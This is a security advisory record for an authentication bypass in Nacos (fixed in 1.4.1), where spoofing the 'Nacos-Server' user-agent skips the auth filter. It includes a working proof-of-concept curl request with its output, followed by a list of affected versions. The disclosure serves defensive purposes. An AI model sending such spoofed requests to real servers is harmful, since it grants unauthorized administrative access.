GHSA-36hp-jr8h-556f

Suggest an improvement
Source
https://github.com/advisories/GHSA-36hp-jr8h-556f
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-36hp-jr8h-556f/GHSA-36hp-jr8h-556f.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-36hp-jr8h-556f
Aliases
Published
2021-04-27T20:09:17Z
Modified
2024-12-02T05:46:00.708163Z
Summary
Authentication Bypass
Details

When configured to use authentication (-Dnacos.core.auth.enabled=true) Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed.

The following request to the configuration endpoint gets rejected as we are not providing any credentials:

❯ curl -X POST "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld"
{"timestamp":"2020-12-02T14:33:57.154+0000","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/cs/configs"}                                                                                                       

However the following one gets accepted by using the Nacos-Server user-agent header:

❯ curl -X POST -A Nacos-Server "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld"
true 

Impact

This issue may allow any user to carry out any administrative tasks on the Nacos server.

Database specific
{
    "nvd_published_at": "2021-04-27T21:15:00Z",
    "cwe_ids": [
        "CWE-290"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-27T20:08:38Z"
}
References

Affected packages

Maven / com.alibaba.nacos:nacos-common

Package

Name
com.alibaba.nacos:nacos-common
View open source insights on deps.dev
Purl
pkg:maven/com.alibaba.nacos/nacos-common

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.4.1

Affected versions

0.*

0.1.0
0.2.0
0.2.1-RC1
0.2.1
0.3.0-RC1
0.3.0
0.4.0
0.5.0
0.6.0
0.6.1
0.6.2
0.8.0
0.8.1
0.8.2
0.9.0
0.9.1

1.*

1.0.0-RC1
1.0.0-RC2
1.0.0-RC3
1.0.0-RC4
1.0.0
1.0.1
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2.0-beta.0
1.2.0-beta.1
1.2.0
1.2.1
1.3.0
1.3.1-BETA
1.3.1-BETA.1
1.3.1
1.3.2
1.3.3
1.4.0-BETA
1.4.0